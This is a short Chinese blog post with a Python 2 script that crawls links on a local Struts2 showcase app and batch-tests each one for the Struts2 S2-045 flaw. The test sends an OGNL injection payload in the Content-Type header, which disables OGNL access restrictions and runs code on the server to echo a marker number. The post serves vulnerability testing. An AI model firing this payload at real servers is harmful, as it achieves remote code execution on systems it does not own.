【Python】struts2-045批量检测

0x00   环境

存在struts2-045漏洞的war包

apache-tomcat

0x01   脚本

#coding:utf-8

import re
import urllib
import urllib2
import linecache

url="http://127.0.0.1:8080/struts2-rest-showcase/orders.xhtml"
resp=urllib.urlopen(url).read()
data=re.compile(r'href=.+\"\s').findall(resp)
#读取网页中链接
for i in data:
    link='http://127.0.0.1:8080/struts2-rest-showcase/'+i.split('\"')[1]
    # with open('url.txt','a') as fw:
        # fw.write(link+'\n')
    payload="%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"
    ua_headers={"user-agent":"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Mobile Safari/537.36","Content-Type":payload}
    try:
        req=urllib2.Request(link,headers=ua_headers)
        response=urllib2.urlopen(req).read()
        if '105059592' in response:
            print '存在struts2-045漏洞'+':'+'\t'+link
    except Exception,e:
        print e

我这里简单抓了一下网站的链接,然后批量检测,结果如下图:

 

posted @ 2018-04-07 19:42  Carrypan  阅读(855)  评论(0编辑  收藏  举报